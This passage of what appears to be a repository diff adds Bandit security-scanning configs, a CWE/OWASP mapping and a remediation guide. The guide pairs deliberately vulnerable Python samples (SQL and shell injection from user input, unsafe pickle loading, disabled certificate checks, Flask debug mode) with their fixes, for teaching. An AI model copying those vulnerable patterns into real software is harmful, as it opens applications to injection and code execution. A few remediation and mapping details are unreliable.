3. Scan only changed files in CI/CD: `git diff --name-only origin/main | grep '.py$' | xargs bandit`
### Issue: Missing Specific Vulnerability Types
**Solution**:
1. Check enabled tests: `bandit -l` (list all tests)
2. Ensure tests are not skipped in `.bandit.yaml`
3. Combine with Semgrep for additional coverage (e.g., business logic vulnerabilities)
4. Update Bandit regularly: `pip install --upgrade bandit`
### Issue: Integration with Pre-commit Hooks
**Solution**:
Use the bundled `assets/pre-commit-config.yaml`:
```yaml
- repo: https://github.com/PyCQA/bandit
rev: '1.7.5'
hooks:
- id: bandit
args: ['-ll', '--recursive', '--configfile', '.bandit.yaml']
```
Install hooks: `pre-commit install`
## References
- [Bandit Documentation](https://bandit.readthedocs.io/)
- [Bandit GitHub Repository](https://github.com/PyCQA/bandit)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
- [CWE Database](https://cwe.mitre.org/)
- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,211 @@
# Bandit Configuration File
# Production-ready configuration for Python security scanning
# Directories to exclude from scanning
exclude_dirs:
# Python environments
- /venv/
- /.venv/
- /env/
- /.env/
- /virtualenv/
- /.virtualenv/
- /site-packages/
- /dist-packages/
# Testing and build artifacts
- /tests/
- /test/
- /.pytest_cache/
- /.tox/
- /build/
- /dist/
- /.eggs/
- /*.egg-info/
# Version control and IDE
- /.git/
- /.svn/
- /.hg/
- /.idea/
- /.vscode/
- /__pycache__/
# Node modules and other language dependencies
- /node_modules/
- /vendor/
# Documentation and examples
- /docs/
- /examples/
# Tests to skip (use sparingly and document reasons)
skips:
# B101: Test for use of assert
# Commonly safe in test files and development code
# Consider keeping this enabled for production code
# - B101
# B311: Standard pseudo-random generators
# Only skip if using for non-security purposes (e.g., data generation)
# NEVER skip for security tokens, session IDs, or cryptographic operations
# - B311
# B404-B412: Import checks
# Skip only if you've reviewed and whitelisted specific imports
# - B404 # subprocess import
# - B405 # xml.etree.cElementTree import
# - B406 # xml.etree.ElementTree import
# - B407 # xml.expat import
# - B408 # xml.dom.minidom import
# - B409 # xml.dom.pulldom import
# - B410 # lxml import
# - B411 # xml.sax import
# - B412 # httpoxy
# Specific tests to run (comment out to run all tests)
# Use this to focus on specific security checks
# tests:
# - B201 # Flask app run with debug=True
# - B301 # Pickle usage
# - B302 # Use of insecure MD2, MD4, MD5, or SHA1 hash
# - B303 # Use of insecure MD2, MD4, MD5, or SHA1 hash
# - B304 # Use of insecure cipher mode
# - B305 # Use of insecure cipher mode
# - B306 # Use of mktemp
# - B307 # Use of eval
# - B308 # Use of mark_safe
# - B310 # Audit URL open for permitted schemes
# - B311 # Standard pseudo-random generators
# - B313 # XML bad element tree
# - B314 # XML bad element tree (lxml)
# - B315 # XML bad element tree (expat)
# - B316 # XML bad element tree (sax)
# - B317 # XML bad element tree (expatreader)
# - B318 # XML bad element tree (expatbuilder)
# - B319 # XML bad element tree (xmlrpc)
# - B320 # XML bad element tree (pulldom)
# - B321 # FTP-related functions
# - B323 # Unverified context
# - B324 # Use of insecure hash functions
# - B601 # Paramiko call with shell=True
# - B602 # subprocess call with shell=True
# - B603 # subprocess without shell equals true
# - B604 # Function call with shell=True
# - B605 # Starting a process with a shell
# - B606 # Starting a process without shell
# - B607 # Starting a process with a partial path
# - B608 # Possible SQL injection
# - B609 # Use of wildcard injection
# - B610 # SQL injection via Django raw SQL
# - B611 # SQL injection via Django extra
# - B701 # jinja2 autoescape false
# - B702 # Test for use of mako templates
# - B703 # Django autoescape false
# Plugin configuration
# Customize individual plugin behaviors
# Shell injection plugin configuration
shell_injection:
# Additional commands to check for shell injection
# Default: ['os.system', 'subprocess.call', 'subprocess.Popen']
no_shell:
- os.system
- subprocess.call
- subprocess.Popen
- subprocess.run
# Hard-coded password plugin configuration
hardcoded_tmp_directory:
# Directories considered safe for temporary files
# tmp_dirs:
# - /tmp
# - /var/tmp
# Output configuration (for reference - set via CLI)
# These are applied at runtime, not in config file
# output_format: json
# output_file: bandit-report.json
# verbose: true
# level: LOW # Report severity: LOW, MEDIUM, HIGH
# confidence: LOW # Report confidence: LOW, MEDIUM, HIGH
# Severity and confidence thresholds
# LOW: Report all issues (default)
# MEDIUM: Report MEDIUM and HIGH severity issues only
# HIGH: Report only HIGH severity issues
# Example usage commands:
#
# Basic scan:
# bandit -r . -c .bandit.yaml
#
# Scan with MEDIUM and HIGH severity only:
# bandit -r . -c .bandit.yaml -ll
#
# Scan with HIGH confidence only:
# bandit -r . -c .bandit.yaml -i
#
# Generate JSON report:
# bandit -r . -c .bandit.yaml -f json -o bandit-report.json
#
# Scan with enhanced analyzer script:
# python scripts/bandit_analyzer.py . --config .bandit.yaml --html report.html
# Progressive security hardening approach:
#
# Phase 1 - Baseline scan (all findings):
# bandit -r . -c .bandit.yaml
#
# Phase 2 - Block CRITICAL (HIGH severity + HIGH confidence):
# bandit -r . -c .bandit.yaml -ll -i
#
# Phase 3 - Block HIGH severity:
# bandit -r . -c .bandit.yaml -ll
#
# Phase 4 - Block MEDIUM and above:
# bandit -r . -c .bandit.yaml -l
#
# Phase 5 - Report all findings:
# bandit -r . -c .bandit.yaml
# Integration with CI/CD:
#
# GitHub Actions:
# - name: Run Bandit
# run: |
# pip install bandit
# bandit -r . -c .bandit.yaml -ll -f json -o bandit-report.json
# bandit -r . -c .bandit.yaml -ll || exit 1
#
# GitLab CI:
# bandit:
# image: python:3.11
# script:
# - pip install bandit
# - bandit -r . -c .bandit.yaml -ll
# allow_failure: false
#
# Jenkins:
# stage('Security Scan') {
# steps {
# sh 'pip install bandit'
# sh 'bandit -r . -c .bandit.yaml -ll -f json -o bandit-report.json'
# }
# }
# False positive handling:
#
# Inline suppression (use sparingly and document):
# import pickle # nosec B403 - Internal use only, not exposed to user input
#
# Line-specific suppression:
# result = eval(safe_expression) # nosec B307
#
# Block suppression:
# # nosec
# import xml.etree.ElementTree as ET
#
# NOTE: Always document WHY you're suppressing a finding
# Security team should review all nosec comments during code review

View File

@@ -0,0 +1,217 @@
# Pre-commit Hook Configuration for Bandit
#
# This configuration integrates Bandit security scanning into your git workflow,
# preventing commits that introduce HIGH severity security vulnerabilities.
#
# Installation:
# 1. Install pre-commit: pip install pre-commit
# 2. Copy this file to .pre-commit-config.yaml in your repository root
# 3. Install hooks: pre-commit install
# 4. (Optional) Run on all files: pre-commit run --all-files
#
# Usage:
# - Hooks run automatically on 'git commit'
# - Bypass hooks temporarily: git commit --no-verify (use sparingly!)
# - Update hooks: pre-commit autoupdate
# - Test hooks: pre-commit run --all-files
repos:
# Python code formatting and linting
- repo: https://github.com/psf/black
rev: 23.12.1
hooks:
- id: black
language_version: python3.11
- repo: https://github.com/pycqa/isort
rev: 5.13.2
hooks:
- id: isort
args: ["--profile", "black"]
- repo: https://github.com/pycqa/flake8
rev: 7.0.0
hooks:
- id: flake8
args: ['--max-line-length=100', '--extend-ignore=E203,W503']
# Security scanning with Bandit
- repo: https://github.com/PyCQA/bandit
rev: '1.7.5'
hooks:
- id: bandit
name: Bandit Security Scan
args:
# Block HIGH and MEDIUM severity issues
- '-ll'
# Recursive scan
- '--recursive'
# Use custom config if present
- '--configfile'
- '.bandit.yaml'
# Skip low-priority tests to reduce false positives
# Uncomment to skip specific tests:
# - '-s'
# - 'B101,B601'
# Only scan Python files
files: \.py$
# Exclude test files (adjust pattern as needed)
exclude: |
(?x)^(
tests/.*|
test_.*\.py|
.*_test\.py
)$
# Alternative Bandit configuration with stricter settings
# Uncomment to use this instead of the above
# - repo: https://github.com/PyCQA/bandit
# rev: '1.7.5'
# hooks:
# - id: bandit
# name: Bandit Security Scan (Strict)
# args:
# # Block only HIGH severity with HIGH confidence (Critical findings)
# - '-ll'
# - '-i'
# - '--recursive'
# - '--configfile'
# - '.bandit.yaml'
# files: \.py$
# Alternative: Run Bandit with custom script for enhanced reporting
# Uncomment to use enhanced analyzer
# - repo: local
# hooks:
# - id: bandit-enhanced
# name: Bandit Enhanced Security Scan
# entry: python scripts/bandit_analyzer.py
# args:
# - '.'
# - '--config'
# - '.bandit.yaml'
# - '--min-priority'
# - '4' # HIGH priority
# language: python
# files: \.py$
# pass_filenames: false
# Additional security and quality checks
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v4.5.0
hooks:
# Prevent commits to main/master
- id: no-commit-to-branch
args: ['--branch', 'main', '--branch', 'master']
# Check for merge conflicts
- id: check-merge-conflict
# Detect private keys
- id: detect-private-key
# Check for large files (>500KB)
- id: check-added-large-files
args: ['--maxkb=500']
# Check YAML syntax
- id: check-yaml
args: ['--safe']
# Check JSON syntax
- id: check-json
# Check for files that would conflict on case-insensitive filesystems
- id: check-case-conflict
# Ensure files end with newline
- id: end-of-file-fixer
# Trim trailing whitespace
- id: trailing-whitespace
# Check for debugger imports
- id: debug-statements
# Dependency security scanning
- repo: https://github.com/Lucas-C/pre-commit-hooks-safety
rev: v1.3.3
hooks:
- id: python-safety-dependencies-check
files: requirements.*\.txt$
# Secret detection
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
exclude: package.lock.json
# Configuration for progressive security hardening
#
# Phase 1: Start with warnings only (for legacy codebases)
# Set bandit args to ['-r', '.', '--configfile', '.bandit.yaml', '--exit-zero']
# This runs Bandit but doesn't block commits
#
# Phase 2: Block HIGH severity only
# Set bandit args to ['-lll', '--recursive', '--configfile', '.bandit.yaml']
#
# Phase 3: Block MEDIUM and HIGH severity
# Set bandit args to ['-ll', '--recursive', '--configfile', '.bandit.yaml']
#
# Phase 4: Block all findings (strictest)
# Set bandit args to ['-l', '--recursive', '--configfile', '.bandit.yaml']
# Bypassing hooks (use judiciously)
#
# Skip all hooks for a single commit:
# git commit --no-verify -m "Emergency hotfix"
#
# Skip specific hook:
# SKIP=bandit git commit -m "Commit message"
#
# Note: All bypasses should be documented and reviewed in code review
# Troubleshooting
#
# Hook fails with "command not found":
# - Ensure pre-commit is installed: pip install pre-commit
# - Reinstall hooks: pre-commit install
#
# Hook fails with import errors:
# - Install dependencies: pip install -r requirements.txt
# - Update hooks: pre-commit autoupdate
#
# Too many false positives:
# - Adjust exclude patterns in .bandit.yaml
# - Use inline # nosec comments with justification
# - Adjust severity threshold in args (-l, -ll, -lll)
#
# Performance issues:
# - Exclude virtual environments in .bandit.yaml
# - Use 'files' and 'exclude' patterns to limit scope
# - Consider running stricter checks only on CI/CD
# CI/CD Integration
#
# Run pre-commit checks in CI/CD:
#
# GitHub Actions:
# - name: Pre-commit checks
# uses: pre-commit/action@v3.0.0
#
# GitLab CI:
# pre-commit:
# image: python:3.11
# script:
# - pip install pre-commit
# - pre-commit run --all-files
#
# Jenkins:
# stage('Pre-commit') {
# steps {
# sh 'pip install pre-commit'
# sh 'pre-commit run --all-files'
# }
# }

View File

@@ -0,0 +1,157 @@
# Bandit Test to CWE and OWASP Mapping
Complete mapping between Bandit test IDs, Common Weakness Enumeration (CWE), and OWASP Top 10 2021 categories.
## Table of Contents
- [Cryptographic Issues](#cryptographic-issues)
- [Injection Vulnerabilities](#injection-vulnerabilities)
- [Security Misconfiguration](#security-misconfiguration)
- [Insecure Deserialization](#insecure-deserialization)
- [Access Control Issues](#access-control-issues)
## Cryptographic Issues
### OWASP A02:2021 - Cryptographic Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B302 | Use of insecure MD2, MD4, MD5, or SHA1 hash function | CWE-327 | MEDIUM |
| B303 | Use of insecure MD2, MD4, or MD5 hash function | CWE-327 | MEDIUM |
| B304 | Use of insecure MD2, MD4, MD5, or SHA1 hash function | CWE-327 | MEDIUM |
| B305 | Use of insecure cipher mode | CWE-327 | MEDIUM |
| B306 | Use of insecure and deprecated function (mktemp) | CWE-377 | MEDIUM |
| B307 | Use of possibly insecure function (eval) | CWE-78 | MEDIUM |
| B311 | Standard pseudo-random generators are not suitable for security | CWE-330 | LOW |
| B323 | Unverified context with insecure default | CWE-327 | MEDIUM |
| B324 | Use of insecure hash functions in hashlib | CWE-327 | HIGH |
| B401 | Use of insecure telnet protocol | CWE-319 | HIGH |
| B402 | Use of insecure FTP protocol | CWE-319 | HIGH |
| B403 | Use of insecure pickle import | CWE-502 | LOW |
| B404 | Use of insecure subprocess import | CWE-78 | LOW |
| B413 | Use of pycrypto | CWE-327 | HIGH |
| B501 | Use of weak cryptographic key | CWE-326 | HIGH |
| B502 | Use of weak SSL/TLS protocol | CWE-327 | HIGH |
| B503 | Use of insecure SSL/TLS cipher | CWE-327 | MEDIUM |
| B504 | SSL with no version specified | CWE-327 | LOW |
| B505 | Use of weak cryptographic hash | CWE-327 | MEDIUM |
**Remediation Strategy**: Replace weak cryptographic algorithms with strong alternatives. Use SHA-256 or SHA-512 for hashing, AES-256 for encryption, and TLS 1.2+ for transport security. For password hashing, use bcrypt, scrypt, or Argon2.
## Injection Vulnerabilities
### OWASP A03:2021 - Injection
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B308 | Use of mark_safe | CWE-80 | MEDIUM |
| B313 | XML bad element tree | CWE-611 | MEDIUM |
| B314 | XML bad element tree (lxml) | CWE-611 | MEDIUM |
| B315 | XML bad element tree (expat) | CWE-611 | MEDIUM |
| B316 | XML bad element tree (sax) | CWE-611 | MEDIUM |
| B317 | XML bad element tree (expatreader) | CWE-611 | MEDIUM |
| B318 | XML bad element tree (expatbuilder) | CWE-611 | MEDIUM |
| B319 | XML bad element tree (xmlrpc) | CWE-611 | HIGH |
| B320 | XML bad element tree (pulldom) | CWE-611 | HIGH |
| B321 | FTP-related functions are being called | CWE-319 | HIGH |
| B405 | XML mini DOM import | CWE-611 | LOW |
| B406 | XML etree import | CWE-611 | LOW |
| B407 | XML expat import | CWE-611 | LOW |
| B408 | XML minidom import | CWE-611 | LOW |
| B410 | XML etree import (lxml) | CWE-611 | LOW |
| B411 | XML standard library imports | CWE-611 | LOW |
| B412 | Deprecated httpoxy vulnerability | CWE-807 | LOW |
| B601 | Paramiko call with shell=True | CWE-78 | HIGH |
| B602 | subprocess call with shell=True | CWE-78 | HIGH |
| B603 | subprocess without shell=True | CWE-78 | LOW |
| B604 | Function call with shell=True | CWE-78 | HIGH |
| B605 | Starting a process with a shell | CWE-78 | HIGH |
| B606 | Starting a process without shell | CWE-78 | LOW |
| B607 | Starting a process with a partial path | CWE-78 | LOW |
| B608 | Possible SQL injection vector through string formatting | CWE-89 | MEDIUM |
| B609 | Use of wildcard injection | CWE-78 | MEDIUM |
| B610 | Potential SQL injection via Django raw SQL | CWE-89 | MEDIUM |
| B611 | Potential SQL injection via Django extra | CWE-89 | MEDIUM |
**Remediation Strategy**: Never concatenate user input into commands, queries, or markup. Use parameterized queries for SQL, safe XML parsers with DTD processing disabled, and avoid `shell=True` in subprocess calls. Use `shlex.split()` for argument parsing.
## Security Misconfiguration
### OWASP A05:2021 - Security Misconfiguration
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B201 | Flask app run with debug=True | CWE-489 | HIGH |
| B310 | Audit URL open for permitted schemes | CWE-939 | MEDIUM |
| B506 | Test for use of yaml load | CWE-20 | MEDIUM |
| B507 | SSH with no host key verification | CWE-295 | MEDIUM |
| B701 | jinja2 autoescape false | CWE-94 | HIGH |
| B702 | Test for use of mako templates | CWE-94 | MEDIUM |
| B703 | Django autoescape false | CWE-94 | MEDIUM |
**Remediation Strategy**: Disable debug mode in production, validate and sanitize all inputs, enable autoescape in template engines, use safe YAML loaders (`yaml.safe_load()`), and enforce strict host key verification for SSH connections.
## Insecure Deserialization
### OWASP A08:2021 - Software and Data Integrity Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B301 | Pickle and modules that wrap it can be unsafe | CWE-502 | MEDIUM |
**Remediation Strategy**: Avoid using pickle for untrusted data. Use JSON, MessagePack, or Protocol Buffers with strict schema validation. If pickle is necessary, implement cryptographic signing and validation of serialized data.
## Access Control Issues
### OWASP A01:2021 - Broken Access Control
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B506 | Test for use of yaml load (arbitrary code execution) | CWE-20 | MEDIUM |
**Remediation Strategy**: Use `yaml.safe_load()` instead of `yaml.load()` to prevent arbitrary code execution. Implement proper access controls and input validation for all YAML processing.
## Hardcoded Credentials
### OWASP A02:2021 - Cryptographic Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B105 | Possible hardcoded password string | CWE-259 | LOW |
| B106 | Possible hardcoded password function argument | CWE-259 | LOW |
| B107 | Possible hardcoded password default argument | CWE-259 | LOW |
**Remediation Strategy**: Never hardcode credentials. Use environment variables, secret management services (HashiCorp Vault, AWS Secrets Manager), or encrypted configuration files with proper key management.
## Priority Matrix
Use this matrix to prioritize remediation efforts:
| Priority | Criteria | Action |
|----------|----------|--------|
| **CRITICAL** | HIGH Severity + HIGH Confidence | Immediate remediation required |
| **HIGH** | HIGH Severity OR MEDIUM Severity + HIGH Confidence | Remediate within 1 sprint |
| **MEDIUM** | MEDIUM Severity + MEDIUM Confidence | Remediate within 2 sprints |
| **LOW** | LOW Severity OR LOW Confidence | Address during refactoring |
| **INFORMATIONAL** | Review only | Document and monitor |
## OWASP Top 10 2021 Coverage
| OWASP Category | Bandit Coverage | Notes |
|----------------|-----------------|-------|
| A01:2021 Broken Access Control | Partial | Covers YAML deserialization |
| A02:2021 Cryptographic Failures | Excellent | Comprehensive crypto checks |
| A03:2021 Injection | Excellent | SQL, command, XML injection |
| A04:2021 Insecure Design | None | Requires manual review |
| A05:2021 Security Misconfiguration | Good | Debug mode, templating |
| A06:2021 Vulnerable Components | None | Use Safety or pip-audit |
| A07:2021 Authentication Failures | Partial | Hardcoded credentials only |
| A08:2021 Data Integrity Failures | Good | Deserialization issues |
| A09:2021 Security Logging Failures | None | Requires manual review |
| A10:2021 SSRF | Partial | URL scheme validation |
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Database](https://cwe.mitre.org/)
- [Bandit Documentation](https://bandit.readthedocs.io/)

View File

@@ -0,0 +1,622 @@
# Bandit Finding Remediation Guide
Comprehensive secure coding patterns and remediation strategies for common Bandit findings.
## Table of Contents
- [Hardcoded Credentials](#hardcoded-credentials)
- [SQL Injection](#sql-injection)
- [Command Injection](#command-injection)
- [Weak Cryptography](#weak-cryptography)
- [Insecure Deserialization](#insecure-deserialization)
- [XML External Entity (XXE)](#xml-external-entity-xxe)
- [Security Misconfiguration](#security-misconfiguration)
---
## Hardcoded Credentials
### B105, B106, B107: Hardcoded Passwords
**Vulnerable Code:**
```python
# B105: Hardcoded password string
DATABASE_PASSWORD = "admin123"
# B106: Hardcoded password in function call
db.connect(host="localhost", password="secret_password")
# B107: Hardcoded password default argument
def connect_db(password="default_pass"):
pass
```
**Secure Solution:**
```python
import os
from dotenv import load_dotenv
# Load environment variables
load_dotenv()
# Use environment variables
DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD")
if not DATABASE_PASSWORD:
raise ValueError("DATABASE_PASSWORD environment variable not set")
# Use environment variables in function calls
db.connect(
host=os.environ.get("DB_HOST", "localhost"),
password=os.environ.get("DB_PASSWORD")
)
# Use secret management service (example with AWS Secrets Manager)
import boto3
from botocore.exceptions import ClientError
def get_secret(secret_name):
session = boto3.session.Session()
client = session.client(service_name='secretsmanager', region_name='us-east-1')
try:
response = client.get_secret_value(SecretId=secret_name)
return response['SecretString']
except ClientError as e:
raise Exception(f"Failed to retrieve secret: {e}")
DATABASE_PASSWORD = get_secret("prod/db/password")
```
**Best Practices:**
- Use environment variables with `.env` files (never commit `.env` to version control)
- Use secret management services (HashiCorp Vault, AWS Secrets Manager, Azure Key Vault)
- Implement secret rotation policies
- Use configuration management tools (Ansible Vault, Kubernetes Secrets)
---
## SQL Injection
### B608: SQL Injection via String Formatting
**Vulnerable Code:**
```python
# String formatting (UNSAFE)
user_id = request.GET['id']
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query)
# String concatenation (UNSAFE)
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
# Percent formatting (UNSAFE)
query = "SELECT * FROM users WHERE email = '%s'" % email
cursor.execute(query)
```
**Secure Solution with psycopg2:**
```python
import psycopg2
# Parameterized queries (SAFE)
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = %s"
cursor.execute(query, (user_id,))
# Multiple parameters
query = "SELECT * FROM users WHERE username = %s AND active = %s"
cursor.execute(query, (username, True))
# Named parameters
query = "SELECT * FROM users WHERE username = %(username)s AND email = %(email)s"
cursor.execute(query, {'username': username, 'email': email})
```
**Secure Solution with SQLAlchemy ORM:**
```python
from sqlalchemy import create_engine, select
from sqlalchemy.orm import Session
# Using ORM (SAFE)
with Session(engine) as session:
stmt = select(User).where(User.username == username)
user = session.execute(stmt).scalar_one_or_none()
# Using bound parameters with raw SQL (SAFE)
with Session(engine) as session:
result = session.execute(
text("SELECT * FROM users WHERE username = :username"),
{"username": username}
)
```
**Secure Solution with Django ORM:**
```python
from django.db.models import Q
# Django ORM (SAFE)
users = User.objects.filter(username=username)
# Complex queries (SAFE)
users = User.objects.filter(Q(username=username) | Q(email=email))
# Raw SQL with parameters (SAFE)
from django.db import connection
with connection.cursor() as cursor:
cursor.execute("SELECT * FROM users WHERE username = %s", [username])
```
**Best Practices:**
- Always use parameterized queries or prepared statements
- Never concatenate user input into SQL queries
- Use ORM when possible for automatic escaping
- Validate and sanitize inputs at application boundaries
- Apply least privilege principle to database accounts
---
## Command Injection
### B602, B604, B605: Shell Injection in Subprocess
**Vulnerable Code:**
```python
import subprocess
import os
# shell=True with user input (VERY UNSAFE)
filename = request.GET['file']
subprocess.call(f"cat {filename}", shell=True)
# os.system with user input (VERY UNSAFE)
os.system(f"ping -c 1 {hostname}")
# String concatenation (UNSAFE)
cmd = "curl " + user_url
subprocess.call(cmd, shell=True)
```
**Secure Solution:**
```python
import subprocess
import shlex
from pathlib import Path
# Use list of arguments without shell=True (SAFE)
filename = request.GET['file']
subprocess.run(["cat", filename], check=True, capture_output=True)
# Validate input before use
def validate_filename(filename):
"""Validate filename to prevent path traversal."""
# Allow only alphanumeric, dash, underscore, and dot
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
raise ValueError("Invalid filename")
# Resolve to absolute path and check it's within allowed directory
file_path = Path(UPLOAD_DIR) / filename
if not file_path.resolve().is_relative_to(Path(UPLOAD_DIR).resolve()):
raise ValueError("Path traversal detected")
return file_path
filename = validate_filename(request.GET['file'])
subprocess.run(["cat", str(filename)], check=True, capture_output=True)
# Use shlex.split() for complex commands
import shlex
command_string = "ping -c 1 example.com"
subprocess.run(shlex.split(command_string), check=True, capture_output=True)
# Whitelist approach for restricted commands
ALLOWED_COMMANDS = {
'ping': ['ping', '-c', '1'],
'traceroute': ['traceroute', '-m', '10'],
}
command_type = request.GET['command']
target = request.GET['target']
if command_type not in ALLOWED_COMMANDS:
raise ValueError("Command not allowed")
# Validate target (e.g., IP address or hostname)
if not re.match(r'^[a-zA-Z0-9.-]+$', target):
raise ValueError("Invalid target")
cmd = ALLOWED_COMMANDS[command_type] + [target]
subprocess.run(cmd, check=True, capture_output=True, timeout=10)
```
**Best Practices:**
- Never use `shell=True` with user input
- Pass arguments as list, not string
- Validate and whitelist all user inputs
- Use `shlex.split()` for parsing command strings
- Implement timeouts to prevent DoS
- Run subprocesses with minimal privileges
---
## Weak Cryptography
### B303, B304, B324: Weak Hash Functions
**Vulnerable Code:**
```python
import hashlib
import md5 # Deprecated
# MD5 (WEAK)
password_hash = hashlib.md5(password.encode()).hexdigest()
# SHA1 (WEAK)
token = hashlib.sha1(user_data.encode()).hexdigest()
```
**Secure Solution:**
```python
import hashlib
import secrets
import bcrypt
from argon2 import PasswordHasher
# SHA-256 for general hashing (ACCEPTABLE for non-password data)
data_hash = hashlib.sha256(data.encode()).hexdigest()
# SHA-512 (BETTER for general hashing)
data_hash = hashlib.sha512(data.encode()).hexdigest()
# bcrypt for password hashing (RECOMMENDED)
def hash_password(password: str) -> bytes:
"""Hash password using bcrypt with salt."""
salt = bcrypt.gensalt(rounds=12) # Cost factor 12
return bcrypt.hashpw(password.encode(), salt)
def verify_password(password: str, hashed: bytes) -> bool:
"""Verify password against bcrypt hash."""
return bcrypt.checkpw(password.encode(), hashed)
# Argon2 for password hashing (BEST - winner of Password Hashing Competition)
ph = PasswordHasher(
time_cost=2, # Number of iterations
memory_cost=65536, # Memory usage in KiB (64 MB)
parallelism=4, # Number of parallel threads
)
def hash_password_argon2(password: str) -> str:
"""Hash password using Argon2."""
return ph.hash(password)
def verify_password_argon2(password: str, hashed: str) -> bool:
"""Verify password against Argon2 hash."""
try:
ph.verify(hashed, password)
return True
except:
return False
# HMAC for message authentication
import hmac
def create_signature(message: str, secret_key: bytes) -> str:
"""Create HMAC-SHA256 signature."""
return hmac.new(
secret_key,
message.encode(),
hashlib.sha256
).hexdigest()
```
### B501, B502, B503: Weak SSL/TLS Configuration
**Vulnerable Code:**
```python
import ssl
import requests
# Weak SSL version (UNSAFE)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
# Disabling certificate verification (VERY UNSAFE)
requests.get('https://example.com', verify=False)
```
**Secure Solution:**
```python
import ssl
import requests
# Strong SSL/TLS configuration (SAFE)
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2
context.maximum_version = ssl.TLSVersion.TLSv1_3
# Restrict cipher suites
context.set_ciphers('ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20:!aNULL:!MD5:!DSS')
# Enable certificate verification (default in requests)
response = requests.get('https://example.com', verify=True)
# Custom CA bundle
response = requests.get('https://example.com', verify='/path/to/ca-bundle.crt')
# For urllib
import urllib.request
import certifi
url = 'https://example.com'
response = urllib.request.urlopen(url, context=context, cafile=certifi.where())
```
**Best Practices:**
- Use TLS 1.2 or TLS 1.3 only
- Disable weak cipher suites
- Always verify certificates in production
- Use certificate pinning for critical connections
- Regularly update SSL/TLS libraries
---
## Insecure Deserialization
### B301: Pickle Usage
**Vulnerable Code:**
```python
import pickle
# Deserializing untrusted data (VERY UNSAFE)
user_data = pickle.loads(request.body)
# Loading from file (UNSAFE if file is from untrusted source)
with open('user_session.pkl', 'rb') as f:
session = pickle.load(f)
```
**Secure Solution:**
```python
import json
import msgpack
from cryptography.fernet import Fernet
# Use JSON for simple data (SAFE)
user_data = json.loads(request.body)
# Use MessagePack for binary efficiency (SAFE)
user_data = msgpack.unpackb(request.body)
# If pickle is absolutely necessary, use cryptographic signing
import hmac
import hashlib
import pickle
SECRET_KEY = os.environ['SECRET_KEY'].encode()
def secure_pickle_dumps(obj):
"""Serialize with HMAC signature."""
pickled = pickle.dumps(obj)
signature = hmac.new(SECRET_KEY, pickled, hashlib.sha256).digest()
return signature + pickled
def secure_pickle_loads(data):
"""Deserialize with signature verification."""
signature = data[:32] # SHA256 is 32 bytes
pickled = data[32:]
expected_signature = hmac.new(SECRET_KEY, pickled, hashlib.sha256).digest()
if not hmac.compare_digest(signature, expected_signature):
raise ValueError("Invalid signature - data may be tampered")
return pickle.loads(pickled)
# Better: Use itsdangerous for secure serialization
from itsdangerous import URLSafeSerializer
serializer = URLSafeSerializer(SECRET_KEY)
# Serialize (signed and safe)
token = serializer.dumps({'user_id': 123, 'role': 'admin'})
# Deserialize (verified)
data = serializer.loads(token)
```
**Best Practices:**
- Avoid pickle for untrusted data
- Use JSON, MessagePack, or Protocol Buffers
- If pickle is required, implement cryptographic signing
- Use `itsdangerous` library for secure token serialization
- Restrict pickle to internal, trusted data only
---
## XML External Entity (XXE)
### B313-B320, B405-B412: XML Parsing Vulnerabilities
**Vulnerable Code:**
```python
import xml.etree.ElementTree as ET
from lxml import etree
# Unsafe XML parsing (VULNERABLE to XXE)
tree = ET.parse(user_xml_file)
root = tree.getroot()
# lxml unsafe parsing
parser = etree.XMLParser()
tree = etree.parse(user_xml_file, parser)
```
**Secure Solution:**
```python
import xml.etree.ElementTree as ET
from lxml import etree
import defusedxml.ElementTree as defusedET
# Use defusedxml (RECOMMENDED)
tree = defusedET.parse(user_xml_file)
root = tree.getroot()
# Disable external entities in ElementTree
ET.XMLParser.entity = {} # Disable entity expansion
# Secure lxml configuration
parser = etree.XMLParser(
resolve_entities=False, # Disable entity resolution
no_network=True, # Disable network access
dtd_validation=False, # Disable DTD validation
load_dtd=False # Don't load DTD
)
tree = etree.parse(user_xml_file, parser)
# Alternative: Use JSON instead of XML when possible
import json
data = json.loads(request.body)
```
**Best Practices:**
- Use `defusedxml` library for all XML parsing
- Disable DTD processing and external entity resolution
- Validate XML against strict schema (XSD)
- Consider using JSON instead of XML for APIs
- Never parse XML from untrusted sources without defusedxml
---
## Security Misconfiguration
### B201: Flask Debug Mode
**Vulnerable Code:**
```python
from flask import Flask
app = Flask(__name__)
# Debug mode in production (VERY UNSAFE)
app.run(debug=True, host='0.0.0.0')
```
**Secure Solution:**
```python
from flask import Flask
import os
app = Flask(__name__)
# Use environment-based configuration
DEBUG = os.environ.get('FLASK_DEBUG', 'false').lower() == 'true'
ENV = os.environ.get('FLASK_ENV', 'production')
if ENV == 'production' and DEBUG:
raise ValueError("Debug mode cannot be enabled in production")
app.config['DEBUG'] = DEBUG
app.config['ENV'] = ENV
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
# Use production WSGI server
if ENV == 'production':
# Deploy with gunicorn or uwsgi, not app.run()
# gunicorn -w 4 -b 0.0.0.0:8000 app:app
pass
else:
